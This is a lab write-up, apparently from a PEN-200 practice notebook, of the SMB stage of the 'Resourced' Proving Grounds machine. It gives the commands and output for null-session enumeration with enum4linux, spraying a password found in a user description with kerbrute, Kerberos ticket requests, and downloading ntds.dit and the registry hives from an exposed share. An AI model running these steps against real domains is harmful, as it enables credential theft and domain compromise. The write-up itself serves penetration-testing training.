SMB

Nmap discovered a Windows Directory service on the target ports 139 and 445

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ nmap --script smb-enum-shares -sV -p139,445 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 20:02 CEST
Nmap scan report for 192.168.169.175
Host is up (0.026s latency).
 
PORT    STATE SERVICE       VERSION
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.14 seconds

Share mapping failed

Null Session

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ nxc smb $IP -u '' -p '' --shares --interfaces 
SMB         192.168.169.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.169.175 445    RESOURCEDC       [+] resourced.local\:
SMB         192.168.169.175 445    RESOURCEDC       [-] Error enumerating shares: STATUS_ACCESS_DENIED

The target SMB server does not allow guest access

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ smbclient -L //$IP/ 
Password for [WORKGROUP\kali]:
Anonymous login successful
 
	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.169.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The target SMB server allows anonymous access but lack of privileges prevents enumerating it.

enum4linux

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ enum4linux -a -r -o -n -A -U $IP
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr 22 20:04:31 2025
 
 =========================================( Target Information )=========================================
 
Target ........... 192.168.169.175
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 
 
 ==========================( Enumerating Workgroup/Domain on 192.168.169.175 )==========================
 
 
[E] Can't find workgroup/domain
 
 
 
 ==============================( Nbtstat Information for 192.168.169.175 )==============================
 
Looking up status of 192.168.169.175
No reply from 192.168.169.175
 
 ==================================( Session Check on 192.168.169.175 )==================================
 
 
[+] Server 192.168.169.175 allows sessions using username '', password ''
 
 
 ===============================( Getting domain SID for 192.168.169.175 )===============================
 
Domain Name: resourced
Domain Sid: S-1-5-21-537427935-490066102-1511301751
 
[+] Host is part of a domain (not a workgroup)
 
 
 =================================( OS information on 192.168.169.175 )=================================
 
 
[E] Can't get OS info with smbclient
 
 
[+] Got OS info for 192.168.169.175 from srvinfo: 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
 
 
 ======================================( Users on 192.168.169.175 )======================================
 
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant	Name: (null)	Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg	Name: (null)	Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson	Name: (null)	Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen	Name: (null)	Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone	Name: (null)	Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason	Name: (null)	Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker	Name: (null)	Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson	Name: (null)	Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson	Name: (null)	Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz	Name: (null)	Desc: New-hired, reminder: HotelCalifornia194!
 
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]
 
 ================================( Share Enumeration on 192.168.169.175 )================================
 
do_connect: Connection to 192.168.169.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
 
	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
 
[+] Attempting to map shares on 192.168.169.175
 
 
 ==========================( Password Policy Information for 192.168.169.175 )==========================
 
 
 
[+] Attaching to 192.168.169.175 using a NULL share
 
[+] Trying protocol 139/SMB...
 
	[!] Protocol failed: Cannot request session (Called Name:192.168.169.175)
 
[+] Trying protocol 445/SMB...
 
[+] Found domain(s):
 
	[+] resourced
	[+] Builtin
 
[+] Password Info for Domain: resourced
 
	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: 41 days 23 hours 53 minutes 
	[+] Password Complexity Flags: 000001
 
		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 1
 
	[+] Minimum password age: 1 day 4 minutes 
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set
 
 
 
[+] Retieved partial password policy with rpcclient:
 
 
Password Complexity: Enabled
Minimum Password Length: 7
 
 
 =====================================( Groups on 192.168.169.175 )=====================================
 
 
[+] Getting builtin groups:
 
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
 
[+]  Getting builtin group memberships:
 
Group: Remote Desktop Users' (RID: 555) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
 
[+]  Getting local groups:
 
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
 
[+]  Getting local group memberships:
 
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
 
[+]  Getting domain groups:
 
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
 
[+]  Getting domain group memberships:
 
Group: 'Domain Controllers' (RID: 516) has member: resourced\RESOURCEDC$
Group: 'Group Policy Creator Owners' (RID: 520) has member: resourced\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: resourced\Administrator
Group: 'Domain Admins' (RID: 512) has member: resourced\Administrator
Group: 'Schema Admins' (RID: 518) has member: resourced\Administrator
Group: 'Domain Guests' (RID: 514) has member: resourced\Guest
Group: 'Domain Users' (RID: 513) has member: resourced\Administrator
Group: 'Domain Users' (RID: 513) has member: resourced\krbtgt
Group: 'Domain Users' (RID: 513) has member: resourced\M.Mason
Group: 'Domain Users' (RID: 513) has member: resourced\K.Keen
Group: 'Domain Users' (RID: 513) has member: resourced\L.Livingstone
Group: 'Domain Users' (RID: 513) has member: resourced\J.Johnson
Group: 'Domain Users' (RID: 513) has member: resourced\V.Ventz
Group: 'Domain Users' (RID: 513) has member: resourced\S.Swanson
Group: 'Domain Users' (RID: 513) has member: resourced\P.Parker
Group: 'Domain Users' (RID: 513) has member: resourced\R.Robinson
Group: 'Domain Users' (RID: 513) has member: resourced\D.Durant
Group: 'Domain Users' (RID: 513) has member: resourced\G.Goldberg
 
 =================( Users on 192.168.169.175 via RID cycling (RIDS: 500-550,1000-1050) )=================
 
 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
 
 
 ==============================( Getting printer info for 192.168.169.175 )==============================
 
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
 
 
enum4linux complete on Tue Apr 22 20:05:32 2025

All the domain users and groups have been enumerated

CLEARTEXT Credential

Interestingly, it revealed what appears to be a CLEARTEXT credential of the V.Ventz user in the Description field.

Validation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ kerbrute passwordspray --dc ResourceDC.resourced.local -d RESOURCED.LOCAL users.txt 'HotelCalifornia194!'     
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 04/22/25 - Ronnie Flathers @ropnop
 
2025/04/22 20:15:24 >  Using KDC(s):
2025/04/22 20:15:24 >  	ResourceDC.resourced.local:88
 
2025/04/22 20:15:24 >  [+] VALID LOGIN:	 V.Ventz@RESOURCED.LOCAL:HotelCalifornia194!
2025/04/22 20:15:24 >  Done! Tested 13 logins (1 successes) in 0.122 seconds

Validated The password indeed belongs to the V.Ventz user

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getTGT RESOURCED.LOCAL/v.ventz@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: HotelCalifornia194!
[*] Saving ticket in v.ventz@ResourceDC.resourced.local.ccache

TGT generated for the v.ventz user

`v.ventz` Session

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=v.ventz@ResourceDC.resourced.local.ccache FindDomainShare RESOURCED.LOCAL/v.ventz@ResourceDC.resourced.local -k -no-pass -dc-ip $IP -check-access -check-admin
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Starting domain share enumeration at 2025-04-22 20:47:37
[*] Connecting to LDAP at RESOURCEDC
[*] LDAP connection successful
[*] Found 1 computers in the domain
[*] Found 6 shares on ResourceDC.resourced.local
[*] Enumeration completed in 0:00:02.022379. Found 6 shares.
 
Found 6 shares:
----------------------------------------------------------------------------------------------------
Computer                   Share          Type             Admin  Read  Write OS                   Remark                                  
----------------------------------------------------------------------------------------------------
ResourceDC.resourced.local ADMIN$         Unknown (Hidden) No     No    No    Windows Server 2019  Remote Admin                            
ResourceDC.resourced.local C$             Unknown (Hidden) No     No    No    Windows Server 2019  Default share                           
ResourceDC.resourced.local IPC$           Disk (Hidden)    No     Yes   No    Windows Server 2019  Remote IPC                              
ResourceDC.resourced.local NETLOGON       Unknown          No     Yes   No    Windows Server 2019  Logon server share                      
ResourceDC.resourced.local Password Audit Unknown          No     Yes   No    Windows Server 2019                                          
ResourceDC.resourced.local SYSVOL         Unknown          No     Yes   No    Windows Server 2019  Logon server share

Using the TGT of the v.ventz user, I can enumerate the target SMB server using my own tool; FindDomainShare

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=v.ventz@ResourceDC.resourced.local.ccache impacket-smbclient RESOURCED.LOCAL/v.ventz@ResourceDC.resourced.local -k -no-pass -dc-ip $IP                                    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Password Audit
SYSVOL

There is a none default share; Password Audit

`Password Audit` Share

# use Password Audit
# tree
/Active Directory/ntds.dit
/Active Directory/ntds.jfm
/registry/SECURITY
/registry/SYSTEM
Finished - 6 files and folders

The Password Audit share contains the registry hive as well as the ntds.dit file

┌──(kali㉿kali)-[~/…/PG_PRACTICE/resourced/smb/Password Audit]
└─$ smbget --recursive "smb://ResourceDC.resourced.local/Password Audit/" -U 'RESOURCED.LOCAL/v.ventz'
Password for [RESOURCED.LOCAL\v.ventz]: HotelCalifornia194!
Using domain: RESOURCED.LOCAL, user: v.ventz
Using domain: RESOURCED.LOCAL, user: v.ventz
Using domain: RESOURCED.LOCAL, user: v.ventz
smb://ResourceDC.resourced.local/Password Audit//Active Directory/ntds.dit                                                              
Using domain: RESOURCED.LOCAL, user: v.ventz
smb://ResourceDC.resourced.local/Password Audit//Active Directory/ntds.jfm                                                              
Using domain: RESOURCED.LOCAL, user: v.ventz
Using domain: RESOURCED.LOCAL, user: v.ventz
smb://ResourceDC.resourced.local/Password Audit//registry/SECURITY                                                                      
Using domain: RESOURCED.LOCAL, user: v.ventz
smb://ResourceDC.resourced.local/Password Audit//registry/SYSTEM                                                                        
Downloaded 40.08MB in 24 seconds

Downloading them to Kali I can use those files to dump hashes

InfoSec LAB

Explorer

Resourced_SMB

SMB

Null Session

enum4linux

CLEARTEXT Credential

Validation

`v.ventz` Session

Interactive Graph View

Table of Contents

Backlinks

InfoSec LAB

Explorer

Resourced_SMB

SMB

Null Session

enum4linux

CLEARTEXT Credential

Validation

v.ventz Session

Password Audit Share

Interactive Graph View

Table of Contents

Backlinks

`v.ventz` Session

`Password Audit` Share